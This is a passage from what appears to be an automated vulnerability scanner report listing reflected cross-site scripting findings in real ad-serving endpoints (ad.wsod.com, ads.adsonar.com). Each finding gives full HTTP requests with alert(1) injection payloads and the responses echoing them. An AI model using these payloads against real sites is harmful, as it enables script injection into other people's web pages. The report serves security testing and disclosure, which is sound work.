Cookie: u=4d650010b6706; i_1=46:475:801:132:0:38101:1300827956:B2|46:675:22:0:0:38100:1300827951:B2|33:1359:827:0:0:38100:1300827757:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 22 Mar 2011 21:40:38 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d650010b6706; expires=Fri, 22-Apr-2011 21:40:38 GMT; path=/
Set-Cookie: i_1=46:477:986:45:0:38107:1300830038:B2|46:475:801:132:0:38101:1300827956:B2|46:675:22:0:0:38100:1300827951:B2; expires=Thu, 21-Apr-2011 21:40:38 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 916

   function wsod_image477() {
       document.write('<a href="http://global.ard.yahoo.com/SIG=15n8i8m1a/M=791401.14523143.14352822.2140147/D=fin/S=2142202388:NE3/Y=YAHOO/EXP=1300835408/L=HxzDrUwNcmBqhH8YTVvEVQCurcHW802JEDAABtwy/B=BCp8UmKImjI-/J=1300828208505883/K=o6O4PDkA5Dj6seEeUVh5rQ/A=6304025/R=0/*&a8486'-alert(1)-'f5bceba6f79=1http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/477.986.iframe.150x30/yhdata*ycg=|yyob=|zip=,|ybt=17-89-274-8319||**;10.2154;1920;1200;http:_@2F_@2Ffinance.yahoo.com_@2Fnews;_ylt=Ag9ozvEv79
...[SNIP]...

1.172. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/1300828242** [&click parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/1300828242**

Issue detail

The value of the &click request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3012a'-alert(1)-'090961222b5 was submitted in the &click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/1300828242**;10,2,154;1920;1200;http%3A_@2F_@2Ffinance.yahoo.com_@2Fnews_@2FBuffett-looking-at-investing-rb-757353019.html%3B_ylt%3DAveahlVQa63dPFBhs1X3QukUaq9_%3B_ylu%3DX3oDMTBycmR0cDExBHBvcwMxBHNlYwN0b3BzdG9yaWVzBHNsawNGMQ--_@3Fx%3D0?yhdata=ycg=&yyob=&zip=,&ybt=17;89;225;226;274;8319&&click=http://global.ard.yahoo.com/SIG=15n088n69/M=791401.14523143.14352822.2140147/D=fin/S=2142203389:NE3/Y=YAHOO/EXP=1300835439/L=56M0nUwNcmBqhH8YTVvEVQD.rcHW802JEE8ABJjp/B=fq_KREwNPVo-/J=1300828239483003/K=9IqHXggXC7f0G5PZ2qRppg/A=6304025/R=0/*3012a'-alert(1)-'090961222b5 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.19271962996572256?yhdata=ycg=&yyob=&zip=,&ybt=17;89;225;226;274;8319&click=http://global.ard.yahoo.com/SIG=15n088n69/M=791401.14523143.14352822.2140147/D=fin/S=2142203389:NE3/Y=YAHOO/EXP=1300835439/L=56M0nUwNcmBqhH8YTVvEVQD.rcHW802JEE8ABJjp/B=fq_KREwNPVo-/J=1300828239483003/K=9IqHXggXC7f0G5PZ2qRppg/A=6304025/R=0/*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:477:988:45:0:42331:1300828217:L|46:475:801:132:0:38101:1300827956:B2|46:675:22:0:0:38100:1300827951:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 22 Mar 2011 21:40:41 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d650010b6706; expires=Fri, 22-Apr-2011 21:40:41 GMT; path=/
Set-Cookie: i_1=46:477:986:45:0:38107:1300830041:B2|46:477:988:45:0:42331:1300828217:L|46:475:801:132:0:38101:1300827956:B2; expires=Thu, 21-Apr-2011 21:40:41 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 950

   function wsod_image477() {
       document.write('<a href="http://global.ard.yahoo.com/SIG=15n088n69/M=791401.14523143.14352822.2140147/D=fin/S=2142203389:NE3/Y=YAHOO/EXP=1300835439/L=56M0nUwNcmBqhH8YTVvEVQD.rcHW802JEE8ABJjp/B=fq_KREwNPVo-/J=1300828239483003/K=9IqHXggXC7f0G5PZ2qRppg/A=6304025/R=0/*3012a'-alert(1)-'090961222b5http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/477.986.iframe.150x30/yhdata*ycg=|yyob=|zip=,|ybt=17-89-225-226-274-8319||**;10.2154;1920;1200;http:_@2F_@2Ffinance.yahoo.com_@2Fnews_@2FBuffet
...[SNIP]...

1.173. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/1300828242** [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/1300828242**

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 366e4'-alert(1)-'962128b0fdb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/1300828242**;10,2,154;1920;1200;http%3A_@2F_@2Ffinance.yahoo.com_@2Fnews_@2FBuffett-looking-at-investing-rb-757353019.html%3B_ylt%3DAveahlVQa63dPFBhs1X3QukUaq9_%3B_ylu%3DX3oDMTBycmR0cDExBHBvcwMxBHNlYwN0b3BzdG9yaWVzBHNsawNGMQ--_@3Fx%3D0?yhdata=ycg=&yyob=&zip=,&ybt=17;89;225;226;274;8319&&click=http://global.ard.yahoo.com/SIG=15n088n69/M=791401.14523143.14352822.2140147/D=fin/S=2142203389:NE3/Y=YAHOO/EXP=1300835439/L=56M0nUwNcmBqhH8YTVvEVQD.rcHW802JEE8ABJjp/B=fq_KREwNPVo-/J=1300828239483003/K=9IqHXggXC7f0G5PZ2qRppg/A=6304025/R=0/*&366e4'-alert(1)-'962128b0fdb=1 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.19271962996572256?yhdata=ycg=&yyob=&zip=,&ybt=17;89;225;226;274;8319&click=http://global.ard.yahoo.com/SIG=15n088n69/M=791401.14523143.14352822.2140147/D=fin/S=2142203389:NE3/Y=YAHOO/EXP=1300835439/L=56M0nUwNcmBqhH8YTVvEVQD.rcHW802JEE8ABJjp/B=fq_KREwNPVo-/J=1300828239483003/K=9IqHXggXC7f0G5PZ2qRppg/A=6304025/R=0/*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:477:988:45:0:42331:1300828217:L|46:475:801:132:0:38101:1300827956:B2|46:675:22:0:0:38100:1300827951:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 22 Mar 2011 21:41:56 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d650010b6706; expires=Fri, 22-Apr-2011 21:41:56 GMT; path=/
Set-Cookie: i_1=46:477:987:45:0:38108:1300830116:B2|46:477:988:45:0:42331:1300828217:L|46:475:801:132:0:38101:1300827956:B2; expires=Thu, 21-Apr-2011 21:41:56 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 953

   function wsod_image477() {
       document.write('<a href="http://global.ard.yahoo.com/SIG=15n088n69/M=791401.14523143.14352822.2140147/D=fin/S=2142203389:NE3/Y=YAHOO/EXP=1300835439/L=56M0nUwNcmBqhH8YTVvEVQD.rcHW802JEE8ABJjp/B=fq_KREwNPVo-/J=1300828239483003/K=9IqHXggXC7f0G5PZ2qRppg/A=6304025/R=0/*&366e4'-alert(1)-'962128b0fdb=1http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/477.987.iframe.150x30/yhdata*ycg=|yyob=|zip=,|ybt=17-89-225-226-274-8319||**;10.2154;1920;1200;http:_@2F_@2Ffinance.yahoo.com_@2Fnews_@2FBuff
...[SNIP]...

1.174. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/1300828246** [&click parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/1300828246**

Issue detail

The value of the &click request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 62f15'-alert(1)-'fccbfcce1ee was submitted in the &click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/1300828246**;10,2,154;1920;1200;http%3A_@2F_@2Ffinance.yahoo.com_@2Fnews_@2Fcategory-bonds%3B_ylt%3DAjko2vz8UWQKvx78UCy.ZSkUaq9_%3B_ylu%3DX3oDMTFjczduZG9rBHBvcwMyBHNlYwNuZXdzU2Vjb25kYXJ5RWxlbWVudHNOYXYEc2xrA2JvbmRz?yhdata=ycg=&yyob=&zip=,&ybt=17;89;225;226;274;8319&&click=http://global.ard.yahoo.com/SIG=15n7pekko/M=791401.14523143.14352822.2140147/D=fin/S=2142203282:NE3/Y=YAHOO/EXP=1300835444/L=qj0Yg0wNcmBqhH8YTVvEVQJxrcHW802JEFQABEzo/B=9S9SQ0wNPGo-/J=1300828244332581/K=AcYdkos2K46fktzpzjHQsA/A=6304025/R=0/*62f15'-alert(1)-'fccbfcce1ee HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.7708217662293464?yhdata=ycg=&yyob=&zip=,&ybt=17;89;225;226;274;8319&click=http://global.ard.yahoo.com/SIG=15n7pekko/M=791401.14523143.14352822.2140147/D=fin/S=2142203282:NE3/Y=YAHOO/EXP=1300835444/L=qj0Yg0wNcmBqhH8YTVvEVQJxrcHW802JEFQABEzo/B=9S9SQ0wNPGo-/J=1300828244332581/K=AcYdkos2K46fktzpzjHQsA/A=6304025/R=0/*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:477:988:45:0:42331:1300828243:L|46:477:988:45:0:42331:1300828217:L|46:475:801:132:0:38101:1300827956:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 22 Mar 2011 21:41:26 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d650010b6706; expires=Fri, 22-Apr-2011 21:41:26 GMT; path=/
Set-Cookie: i_1=46:477:988:45:0:38108:1300830086:B2|46:477:988:45:0:42331:1300828243:L|46:477:988:45:0:42331:1300828217:L; expires=Thu, 21-Apr-2011 21:41:26 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 931

   function wsod_image477() {
       document.write('<a href="http://global.ard.yahoo.com/SIG=15n7pekko/M=791401.14523143.14352822.2140147/D=fin/S=2142203282:NE3/Y=YAHOO/EXP=1300835444/L=qj0Yg0wNcmBqhH8YTVvEVQJxrcHW802JEFQABEzo/B=9S9SQ0wNPGo-/J=1300828244332581/K=AcYdkos2K46fktzpzjHQsA/A=6304025/R=0/*62f15'-alert(1)-'fccbfcce1eehttp://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/477.988.iframe.150x30/yhdata*ycg=|yyob=|zip=,|ybt=17-89-225-226-274-8319||**;10.2154;1920;1200;http:_@2F_@2Ffinance.yahoo.com_@2Fnews_@2Fcatego
...[SNIP]...

1.175. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/1300828246** [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/1300828246**

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 929c9'-alert(1)-'99ceb1ea3fc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/1300828246**;10,2,154;1920;1200;http%3A_@2F_@2Ffinance.yahoo.com_@2Fnews_@2Fcategory-bonds%3B_ylt%3DAjko2vz8UWQKvx78UCy.ZSkUaq9_%3B_ylu%3DX3oDMTFjczduZG9rBHBvcwMyBHNlYwNuZXdzU2Vjb25kYXJ5RWxlbWVudHNOYXYEc2xrA2JvbmRz?yhdata=ycg=&yyob=&zip=,&ybt=17;89;225;226;274;8319&&click=http://global.ard.yahoo.com/SIG=15n7pekko/M=791401.14523143.14352822.2140147/D=fin/S=2142203282:NE3/Y=YAHOO/EXP=1300835444/L=qj0Yg0wNcmBqhH8YTVvEVQJxrcHW802JEFQABEzo/B=9S9SQ0wNPGo-/J=1300828244332581/K=AcYdkos2K46fktzpzjHQsA/A=6304025/R=0/*&929c9'-alert(1)-'99ceb1ea3fc=1 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.7708217662293464?yhdata=ycg=&yyob=&zip=,&ybt=17;89;225;226;274;8319&click=http://global.ard.yahoo.com/SIG=15n7pekko/M=791401.14523143.14352822.2140147/D=fin/S=2142203282:NE3/Y=YAHOO/EXP=1300835444/L=qj0Yg0wNcmBqhH8YTVvEVQJxrcHW802JEFQABEzo/B=9S9SQ0wNPGo-/J=1300828244332581/K=AcYdkos2K46fktzpzjHQsA/A=6304025/R=0/*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:477:988:45:0:42331:1300828243:L|46:477:988:45:0:42331:1300828217:L|46:475:801:132:0:38101:1300827956:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 22 Mar 2011 21:42:24 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d650010b6706; expires=Fri, 22-Apr-2011 21:42:24 GMT; path=/
Set-Cookie: i_1=46:477:986:45:0:38108:1300830144:B2|46:477:988:45:0:42331:1300828243:L|46:477:988:45:0:42331:1300828217:L; expires=Thu, 21-Apr-2011 21:42:24 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 934

   function wsod_image477() {
       document.write('<a href="http://global.ard.yahoo.com/SIG=15n7pekko/M=791401.14523143.14352822.2140147/D=fin/S=2142203282:NE3/Y=YAHOO/EXP=1300835444/L=qj0Yg0wNcmBqhH8YTVvEVQJxrcHW802JEFQABEzo/B=9S9SQ0wNPGo-/J=1300828244332581/K=AcYdkos2K46fktzpzjHQsA/A=6304025/R=0/*&929c9'-alert(1)-'99ceb1ea3fc=1http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/477.986.iframe.150x30/yhdata*ycg=|yyob=|zip=,|ybt=17-89-225-226-274-8319||**;10.2154;1920;1200;http:_@2F_@2Ffinance.yahoo.com_@2Fnews_@2Fcate
...[SNIP]...

1.176. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/1300828252** [&click parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/1300828252**

Issue detail

The value of the &click request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload de07c'-alert(1)-'6a4bc9f3825 was submitted in the &click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/1300828252**;10,2,154;1920;1200;http%3A_@2F_@2Ffinance.yahoo.com_@2Fnews_@2Fcategory-legal-matters%3B_ylt%3DAvy6SeQ7msNsv0vs8J.ekvsUaq9_%3B_ylu%3DX3oDMTFrMDdham85BHBvcwMxNwRzZWMDbmV3c1NlY29uZGFyeUVsZW1lbnRzTmF2BHNsawNsZWdhbGxhd21hdHQ-?yhdata=ycg=&yyob=&zip=,&ybt=17;89;225;226;274;8319&&click=http://global.ard.yahoo.com/SIG=15nfpkqui/M=791401.14523143.14352822.2140147/D=fin/S=2142203299:NE3/Y=YAHOO/EXP=1300835451/L=eNGyZ0wNcmBqhH8YTVvEVQM4rcHW802JEFsAA_9l/B=DxcEK0wNPGY-/J=1300828251321631/K=2h7T3fdmBStsXEJ.lFLaCA/A=6304025/R=0/*de07c'-alert(1)-'6a4bc9f3825 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.17115531559102237?yhdata=ycg=&yyob=&zip=,&ybt=17;89;225;226;274;8319&click=http://global.ard.yahoo.com/SIG=15nfpkqui/M=791401.14523143.14352822.2140147/D=fin/S=2142203299:NE3/Y=YAHOO/EXP=1300835451/L=eNGyZ0wNcmBqhH8YTVvEVQM4rcHW802JEFsAA_9l/B=DxcEK0wNPGY-/J=1300828251321631/K=2h7T3fdmBStsXEJ.lFLaCA/A=6304025/R=0/*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:477:988:45:0:42331:1300828246:L|46:477:988:45:0:42331:1300828243:L|46:477:988:45:0:42331:1300828217:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 22 Mar 2011 21:43:20 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d650010b6706; expires=Fri, 22-Apr-2011 21:43:20 GMT; path=/
Set-Cookie: i_1=46:477:987:45:0:38108:1300830200:B2|46:477:988:45:0:42331:1300828246:L|46:477:988:45:0:42331:1300828243:L; expires=Thu, 21-Apr-2011 21:43:20 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 951

   function wsod_image477() {
       document.write('<a href="http://global.ard.yahoo.com/SIG=15nfpkqui/M=791401.14523143.14352822.2140147/D=fin/S=2142203299:NE3/Y=YAHOO/EXP=1300835451/L=eNGyZ0wNcmBqhH8YTVvEVQM4rcHW802JEFsAA_9l/B=DxcEK0wNPGY-/J=1300828251321631/K=2h7T3fdmBStsXEJ.lFLaCA/A=6304025/R=0/*de07c'-alert(1)-'6a4bc9f3825http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/477.987.iframe.150x30/yhdata*ycg=|yyob=|zip=,|ybt=17-89-225-226-274-8319||**;10.2154;1920;1200;http:_@2F_@2Ffinance.yahoo.com_@2Fnews_@2Fcatego
...[SNIP]...

1.177. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/1300828252** [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/1300828252**

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c47d5'-alert(1)-'699efdbd867 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/1300828252**;10,2,154;1920;1200;http%3A_@2F_@2Ffinance.yahoo.com_@2Fnews_@2Fcategory-legal-matters%3B_ylt%3DAvy6SeQ7msNsv0vs8J.ekvsUaq9_%3B_ylu%3DX3oDMTFrMDdham85BHBvcwMxNwRzZWMDbmV3c1NlY29uZGFyeUVsZW1lbnRzTmF2BHNsawNsZWdhbGxhd21hdHQ-?yhdata=ycg=&yyob=&zip=,&ybt=17;89;225;226;274;8319&&click=http://global.ard.yahoo.com/SIG=15nfpkqui/M=791401.14523143.14352822.2140147/D=fin/S=2142203299:NE3/Y=YAHOO/EXP=1300835451/L=eNGyZ0wNcmBqhH8YTVvEVQM4rcHW802JEFsAA_9l/B=DxcEK0wNPGY-/J=1300828251321631/K=2h7T3fdmBStsXEJ.lFLaCA/A=6304025/R=0/*&c47d5'-alert(1)-'699efdbd867=1 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.17115531559102237?yhdata=ycg=&yyob=&zip=,&ybt=17;89;225;226;274;8319&click=http://global.ard.yahoo.com/SIG=15nfpkqui/M=791401.14523143.14352822.2140147/D=fin/S=2142203299:NE3/Y=YAHOO/EXP=1300835451/L=eNGyZ0wNcmBqhH8YTVvEVQM4rcHW802JEFsAA_9l/B=DxcEK0wNPGY-/J=1300828251321631/K=2h7T3fdmBStsXEJ.lFLaCA/A=6304025/R=0/*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:477:988:45:0:42331:1300828246:L|46:477:988:45:0:42331:1300828243:L|46:477:988:45:0:42331:1300828217:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 22 Mar 2011 21:44:01 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d650010b6706; expires=Fri, 22-Apr-2011 21:44:01 GMT; path=/
Set-Cookie: i_1=46:477:985:45:0:38108:1300830241:B2|46:477:988:45:0:42331:1300828246:L|46:477:988:45:0:42331:1300828243:L; expires=Thu, 21-Apr-2011 21:44:01 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 954

   function wsod_image477() {
       document.write('<a href="http://global.ard.yahoo.com/SIG=15nfpkqui/M=791401.14523143.14352822.2140147/D=fin/S=2142203299:NE3/Y=YAHOO/EXP=1300835451/L=eNGyZ0wNcmBqhH8YTVvEVQM4rcHW802JEFsAA_9l/B=DxcEK0wNPGY-/J=1300828251321631/K=2h7T3fdmBStsXEJ.lFLaCA/A=6304025/R=0/*&c47d5'-alert(1)-'699efdbd867=1http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/477.985.iframe.150x30/yhdata*ycg=|yyob=|zip=,|ybt=17-89-225-226-274-8319||**;10.2154;1920;1200;http:_@2F_@2Ffinance.yahoo.com_@2Fnews_@2Fcate
...[SNIP]...

1.178. http://ads.adsonar.com/adserving/getAds.jsp [pid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adsonar.com
Path:   /adserving/getAds.jsp

Issue detail

The value of the pid request parameter is copied into the HTML document as plain text between tags. The payload b0db8<script>alert(1)</script>b9d279cd0fe was submitted in the pid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adserving/getAds.jsp?previousPlacementIds=&placementId=1512388&pid=1098767b0db8<script>alert(1)</script>b9d279cd0fe&ps=-1&zw=250&zh=325&url=http%3A//www.tmz.com/2011/03/22/chris-pontius-party-boy-jackass-divorce-claire-nolan/&v=5&dct=Chris%20Pontius%20to%20Divorce%20--%20'Jackass'%20Star's%20Marriage%20--%20The%20Party's%20Over%20%7C%20TMZ.com&ref=http%3A//www.tmz.com/&metakw=chris%20pontius%20divorce,jackass%20star%20divorce,claire%20nolan HTTP/1.1
Host: ads.adsonar.com
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/2011/03/22/chris-pontius-party-boy-jackass-divorce-claire-nolan/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 22 Mar 2011 22:05:06 GMT
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: policyref="http://ads.adsonar.com/w3c/p3p.xml", CP="NOI DSP LAW NID CURa ADMa DEVa TAIo PSAo PSDo OUR SAMa OTRa IND UNI PUR COM NAV INT DEM STA PRE LOC"
Content-Type: text/html;charset=utf-8
Vary: Accept-Encoding,User-Agent
Content-Length: 2510


           <!DOCTYPE html PUBLIC "-//W3C//DTD html 4.01 transitional//EN">
           <html>
               <head>
                   <title>Ads by Quigo</title>
                   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
...[SNIP]...
</script>
                   
                   
                                           java.lang.NumberFormatException: For input string: "1098767b0db8<script>alert(1)</script>b9d279cd0fe"

   
                                                           </head>
...[SNIP]...

1.179. http://ads.adsonar.com/adserving/getAds.jsp [placementId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adsonar.com
Path:   /adserving/getAds.jsp

Issue detail

The value of the placementId request parameter is copied into an HTML comment. The payload 552fa--><script>alert(1)</script>fa864e4f42d was submitted in the placementId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adserving/getAds.jsp?previousPlacementIds=&placementId=1512388552fa--><script>alert(1)</script>fa864e4f42d&pid=1098767&ps=-1&zw=250&zh=325&url=http%3A//www.tmz.com/2011/03/22/chris-pontius-party-boy-jackass-divorce-claire-nolan/&v=5&dct=Chris%20Pontius%20to%20Divorce%20--%20'Jackass'%20Star's%20Marriage%20--%20The%20Party's%20Over%20%7C%20TMZ.com&ref=http%3A//www.tmz.com/&metakw=chris%20pontius%20divorce,jackass%20star%20divorce,claire%20nolan HTTP/1.1
Host: ads.adsonar.com
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/2011/03/22/chris-pontius-party-boy-jackass-divorce-claire-nolan/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 22 Mar 2011 22:05:04 GMT
